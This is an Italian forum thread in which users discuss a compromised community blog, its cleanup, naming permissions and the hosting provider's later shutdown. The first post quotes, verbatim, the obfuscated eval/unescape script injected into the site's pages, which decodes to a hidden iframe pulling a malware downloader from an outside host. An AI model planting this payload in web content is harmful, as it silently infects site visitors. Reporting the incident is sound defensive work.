Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Antivirus e Sicurezza > AV e sicurezza in generale

I nuovi notebook Acer al debutto al Computex 2025
I nuovi notebook Acer al debutto al Computex 2025
Al Computex 2025 di Taipei Acer mostra una completa gamma di soluzioni notebook delle famiglie Swift, Aspire, Predator e Nitro pensati per gli utenti consumer oltre che per coloro che ricercano elevata potenza di elaborazione, per lavorare o per giocare. In base al modello troviamo piattaforme Intel, AMD oppure Qualcomm anche in abbinamento alle nuove GPU NVIDIA GeForce RTX 5000
Nutanix .NEXT: così l'azienda vuole aiutare i clienti a limitare la dipendenza da Broadcom
Nutanix .NEXT: così l'azienda vuole aiutare i clienti a limitare la dipendenza da Broadcom
All'evento globale di Nutanix l'azienda ha presentato una serie di novità mirate a ridurre la dipendenza dalle soluzioni di VMware/Broadcom. Arriva Cloud Native AOS, soluzione che non richiede di appoggiarsi ad hypervisor. Novità per Nutanix Enterprise AI. Potenziata la collaborazione con Pure Storage per uno storage dedicato ad altissime prestazioni
HUAWEI WATCH FIT 4 Pro: lo smartwatch che non ha rivali a questo prezzo!
HUAWEI WATCH FIT 4 Pro: lo smartwatch che non ha rivali a questo prezzo!
HUAWEI è capace di sorprendere ancora e quest’anno lo fa con questo nuovo smartwatch WATCH FIT 4 Pro che coniuga un design elegante e moderno con funzionalità di prim’ordine. Ultra-sottile con display AMOLED, funzionalità avanzate per sport e salute, e un'autonomia fino a 10 giorni.
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi

Strumenti
Old 28-07-2008, 13:56   #1
xcdegasp
Senior Member

L'Avatar di xcdegasp

Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
www.hwupgrade.helloweb.eu sotto attacco

ebbene sì sono arrivati anche lì gli attacchi, sul blog creato per alcuni progetti sviluppati dagli utenti di queste aree, oggi alle 08:20 sono state modificate due pagine sorgenti iniettando codice offuscato:
Codice:
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%34%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6b%61%72%61%62%6f%6b%2e%62%69%7a%2f%73%70%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%33%33%33%37%31%29%2b%27%65%61%34%38%5c%27%20%77%69%64%74%68%3d%31%35%31%20%68%65%69%67%68%74%3d%32%32%31%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>
gli attributi dei due files erano corretti ad ogni modo è stato un automatismo a iniettarli inquanto a fondo pagina
la destinazione era un bel "Virus or unwanted program 'HTML/Dldr.Iframe.DP [virus]'"

ovviamente ho i file con tale modifica per chi volesse

mi correggo, tutti i file index.php sono stati modificati...

Ultima modifica di xcdegasp : 28-07-2008 alle 14:19.
xcdegasp è offline   Rispondi citando il messaggio o parte di esso
Old 28-07-2008, 14:40   #2
c.m.g
Senior Member

L'Avatar di c.m.g

Iscritto dal: Mar 2006
beh prima o poi sarebbe accaduto!
Questa opera è distribuita secondo le regole di licenza Creative Commons salvo diversa indicazione. Chiunque volesse citare il contenuto di questo post deve necessariamente riportare il link originario.
c.m.g è offline   Rispondi citando il messaggio o parte di esso
Old 28-07-2008, 14:41   #3
wizard1993
Senior Member

L'Avatar di wizard1993

Iscritto dal: Apr 2006
mi verrebbe voglia di massacrarli qualche volta, hai provveduto a togliere?
Old 28-07-2008, 14:43   #4
juninho85
Bannato

L'Avatar di juninho85

Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
"è segno che stiamo facendo un buon lavoro" cit.
juninho85 è offline   Rispondi citando il messaggio o parte di esso
Old 28-07-2008, 15:04   #5
xcdegasp
Senior Member

L'Avatar di xcdegasp

concordo con juninho85 considerando che oggi, sfiga vuole dopol'infezione, abbiamo avuto visite dal japan e francia

comunque un lavoraccio correggere tutto e veramente lunghetto, modificarli a loro c'è voluto solo 3 minuti

ora è lindo come fosse passato mastrolindo (= eraser? )
Old 28-07-2008, 15:18   #6
juninho85
Bannato

L'Avatar di juninho85

Iscritto dal: Mar 2004
Città: Galapagos Attenzione:utente flautolente,tienilo a mente
scusa ma...non basta "semplicemente" ripulire da quelle 2 righette di codice?
juninho85 è offline   Rispondi citando il messaggio o parte di esso
Old 28-07-2008, 15:43   #7
eraser
Senior Member

L'Avatar di eraser

Città: Bastia Umbra (PG)
Quote:
Originariamente inviato da xcdegasp Guarda i messaggi
ora è lindo come fosse passato mastrolindo (= eraser? )

Comunque, in generale, mi preme di chiedervi un'altra cosa.

Per l'utilizzo del nome "hwupgrade" nel vostro sito, sia nel link che in home page, avete sentito la redazione di Hardware Upgrade?

Il nome è registrato e non sarebbe corretto utilizzarlo senza chiederne l'autorizzazione.

Vedo ad esempio in home: Lista indirizzi IP dei server da bloccare by HwUpgrade.it.

Agli occhi di una persona che non sa nulla di tutto ciò, sembrerebbe che l'iniziativa sia nata dalla redazione. In aggiunta, se un qualche utente fosse rimasto infetto a causa di questo attacco, potrebbe dare la colpa alla redazione - la quale in realtà è ignara di tutta questa iniziativa.

Non voglio in alcun modo bacchettare o altro, sia chiaro. L'iniziativa è molto bella ed utile, però prima di utilizzare un nome di un'azienda senza specificare bene che si tratta di un'attività del tutto slegata dalla redazione e portata avanti in maniera autonoma dagli utenti del forum penso che magari dovreste informarne i legali possessori.
Old 28-07-2008, 16:14   #8
Nicodemo Timoteo Taddeo
Senior Member

L'Avatar di Nicodemo Timoteo Taddeo

Iscritto dal: Mar 2008
Quote:
ebbene sì sono arrivati anche lì gli attacchi,
Sì ma vi siete chiesti dove sta la vulnerabilità (software o umana che sia) cui si sono agganciati? Non è che se un giorno mi alzo con la luna storta, avvio firefox e mi metto a modificare pagine web come mi pare e piace.

Insomma trovo molto strano che ci sono siti ripetutamente violati, wintricks tanto per non fare nomi, e i cui gestori festeggiano a caviale e champagne ogni volta che rimediano alle compromissioni, come fosse la cosa più normale del mondo riceverne, e senza dare la minima impressione di voler fare tutto quello necessario per impedirne il ripetersi.

<polemic>
Secondo me c'è chi non ci capisce proprio nulla, e si limita solo a ripulire le pagine ogni volta
</polemic>

ps. a scanso di equivoci il mio discorso polemico non è rivolto a voi personalmente, ma al contesto generale.

Saluti.
Nicodemo Timoteo Taddeo è offline   Rispondi citando il messaggio o parte di esso
Old 28-07-2008, 18:05   #9
wizard1993
Senior Member

L'Avatar di wizard1993

Iscritto dal: Apr 2006
Quote:
Originariamente inviato da Nicodemo Timoteo Taddeo Guarda i messaggi
Sì ma vi siete chiesti dove sta la vulnerabilità (software o umana che sia) cui si sono agganciati? Non è che se un giorno mi alzo con la luna storta, avvio firefox e mi metto a modificare pagine web come mi pare e piace.

Insomma trovo molto strano che ci sono siti ripetutamente violati, wintricks tanto per non fare nomi, e i cui gestori festeggiano a caviale e champagne ogni volta che rimediano alle compromissioni, come fosse la cosa più normale del mondo riceverne, e senza dare la minima impressione di voler fare tutto quello necessario per impedirne il ripetersi.

<polemic>
Secondo me c'è chi non ci capisce proprio nulla, e si limita solo a ripulire le pagine ogni volta
</polemic>

ps. a scanso di equivoci il mio discorso polemico non è rivolto a voi personalmente, ma al contesto generale.

Saluti.
la piattaforma è apache all'utilma versione e worldpress nemmeno toccato, ora va a finire che la scrivo io la piattaforma il jsp
Old 28-07-2008, 18:45   #10
Nicodemo Timoteo Taddeo
Senior Member

L'Avatar di Nicodemo Timoteo Taddeo

Iscritto dal: Mar 2008
Quote:
Originariamente inviato da wizard1993 Guarda i messaggi
la piattaforma è apache all'utilma versione e worldpress nemmeno toccato, ora va a finire che la scrivo io la piattaforma il jsp

È del tutto da escludere l'intervento umano, volente o a sua insaputa? Intendo dire: qualcuno nella catena della gestione ed hosting che si lascia sfuggire le password? Sto solo chiedendo perché mi sembra molto, troppo strano.

Per carità nessuno si offenda, ma insomma sti keylogger e/o trojan a qualcosa serviranno, o no?

Saluti.
Nicodemo Timoteo Taddeo è offline   Rispondi citando il messaggio o parte di esso
Old 28-07-2008, 19:12   #11
Lazza84
Senior Member

L'Avatar di Lazza84

Iscritto dal: Aug 2006
Città: µTorrent
Quote:
Originariamente inviato da eraser Guarda i messaggi

Per l'utilizzo del nome "hwupgrade" nel vostro sito, sia nel link che in home page, avete sentito la redazione di Hardware Upgrade?

Il nome è registrato e non sarebbe corretto utilizzarlo senza chiederne l'autorizzazione.

Vedo ad esempio in home: Lista indirizzi IP dei server da bloccare by HwUpgrade.it.

Agli occhi di una persona che non sa nulla di tutto ciò, sembrerebbe che l'iniziativa sia nata dalla redazione. In aggiunta, se un qualche utente fosse rimasto infetto a causa di questo attacco, potrebbe dare la colpa alla redazione - la quale in realtà è ignara di tutta questa iniziativa.

Non voglio in alcun modo bacchettare o altro, sia chiaro. L'iniziativa è molto bella ed utile, però prima di utilizzare un nome di un'azienda senza specificare bene che si tratta di un'attività del tutto slegata dalla redazione e portata avanti in maniera autonoma dagli utenti del forum penso che magari dovreste informarne i legali possessori.
Hai perfettamente ragione, io credo che una tacita autorizzazione ci sia, ovvero all'inizio quando non c'era ancora la pagina web ma lo spazio iniziava a scarseggiare via degasp chiedemmo ai piani alti se fosse possibile ottenere un piccolo spazio nella sacra sezione download ma il miracolo non si avverò.
Credo che se gli girassero per il nome utilizzato l'avrebbero fatto presente...
Cmq se servono degli ulteriori chiarimenti espliciti nn saprei.... che dici degasp ?
Old 28-07-2008, 20:27   #12
xcdegasp
Senior Member

L'Avatar di xcdegasp

Quote:
Originariamente inviato da eraser Guarda i messaggi

effettivamente non avevo chiesto se desse fastidio questo nome alla redazione,l'intento era il riferimento ai progetti del forum fatto dagli utenti ma ignoravo il fatto del collegamento alla redazione..
ad ogni modo come gestione siamo limitati dal fatto che il 90% è tutto gestito da helloweb.eu a differenza degli spazi apagamento nei quali hai la quasi totalità di controllo

pensate che proprio ieri sera ho aggiornato i vari plugin in uso inquanto era appena uscito un aggiornamento, questo a dimostrazione che per quanto uno si possa scervellare a mantenere alta la protezione c'è sempre da qualche parte una porta serrata male in una stanza che non è accessibile a noi ma dall'interno accedi tranquillamente al corridoio

Ultima modifica di xcdegasp : 28-07-2008 alle 20:31.
Old 28-07-2008, 20:32   #13
eraser
Senior Member

L'Avatar di eraser

Città: Bastia Umbra (PG)
Chiaro, come detto prima, non era per bacchettarvi Era semplicemente una annotazione per il futuro, onde evitare poi anche disguidi di natura legale (non hwupgrade, ma ci sono società che non guardano in faccia a chi e a cosa, prima denunciano e poi ne parlano)
Old 28-07-2008, 21:04   #14
xcdegasp
Senior Member

L'Avatar di xcdegasp

hai fatto bene a evidenziarlo perchè proprio non ci pensavo
Old 06-02-2009, 13:58   #15
xcdegasp
Senior Member

L'Avatar di xcdegasp

Riesumo questo thread per pubblicare un'email appena giunta dalla direzione di Helloweb.eu:

Quote:
Gentile utente, i servizi di HelloWeb Lunedì 09/02/2009 verranno sospesi a tempo indeterminato per cui chi ha un sito attivo dovrà effettuare i backup del proprio sito e trasferirsi su altro hoster entro lunedì poichè non sarà più possibile avere un backup dei files dopo quella data! Il motivo è principalmente dovuto a molte persone disoneste che svolgono attività illecite appoggiandosi anche sui nostri server! Lo staff HelloWeb ha fatto un lavoro immane per cercare di mantenere i propri servizi puliti ma evidentemente non è bastato per cui siamo costretti a chiudere i nostri servizi. Tutti gli utenti che hanno acquistato da noi SpazioWeb e dominio potranno richiedere l'eventuale chiave di trasferimento e il rimborso del servizio acquistato inviando una mail a: rescue@helloweb.eu indicando il proprio username, password e il servizio acquistato e il nome del dominio. Il Backup e il trasferimento dei dati verso un altro host è a proprio carico e va effettuato entro Lunedì 09/02/2009 Vogliamo far notare che qualora ci siano problemi i rimborsi verranno effettuati quando ciò sarà possibile nel minor tempo. Ci dispiace dare così poco tempo per il trasferimento dei dati ma non sappiamo quanto tempo ci rimane. Siamo profondamente delusi e amareggiati per anni e anni di lavoro buttati al vento in pochissimi giorni! Speriamo tanto che questo non sia un addio ma un arrivederci. Ringraziamo i nostri utenti ONESTI che ci hanno sempre appoggiato e supportato nonostante i problemi avuti. GRAZIE infinitamente per tutto Lo staff di HelloWeb
Old 07-02-2009, 09:34   #16
Unax
Senior Member

L'Avatar di Unax

Iscritto dal: Oct 2008
Quote:
Riesumo questo thread per pubblicare un'email appena giunta dalla direzione di Helloweb.eu:

a chi si riferiscono con il termine utenti disonesti?
Unax è offline   Rispondi citando il messaggio o parte di esso
Old 08-02-2009, 00:44   #17
xcdegasp
Senior Member

L'Avatar di xcdegasp

Quote:
Originariamente inviato da Unax Guarda i messaggi
a chi si riferiscono con il termine utenti disonesti?
sicuramente a coloro che eseguivano questo tipo di attacchi
 Rispondi

I nuovi notebook Acer al debutto al Computex 2025 I nuovi notebook Acer al debutto al Computex 202...
Nutanix .NEXT: così l'azienda vuole aiutare i clienti a limitare la dipendenza da Broadcom Nutanix .NEXT: così l'azienda vuole aiuta...
HUAWEI WATCH FIT 4 Pro: lo smartwatch che non ha rivali a questo prezzo! HUAWEI WATCH FIT 4 Pro: lo smartwatch che non ha...
Test NIU RQi Sport, vi spieghiamo perché una moto così è perfetta Test NIU RQi Sport, vi spieghiamo perché ...
Start Campus: il datacenter raffreddato dal mare Start Campus: il datacenter raffreddato dal mare
Computex 2025: Acer presenta novità tra ...
MSI PortalX: il controllo RGB diventa we...
Super portatili, tablet a 99€, iPhone, M...
Il più venduto su Amazon: torna a...
Da 260€ a 520€: sono gli sconti reali su...
iPhone 16, 16 Pro e 16 Pro Max: sono tut...
2 tablet imbattibili: Honor Pad X8a a 99...
Hideo Kojima morirà, ma la sua cr...
Senti chi parla! Davvero, ora, grazie al...
Tesla sempre peggio in Europa: un'aziend...
Le minacce di Trump funzionano: un altro...
Cosa succede in Amazon? Sconti anomali s...
Flop Call of Duty Warzone Mobile, Activi...
Roborock Qrevo Curv, sconto di 400€ per ...
OLED LG 2024 in sconto su Amazon: 55'' S...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian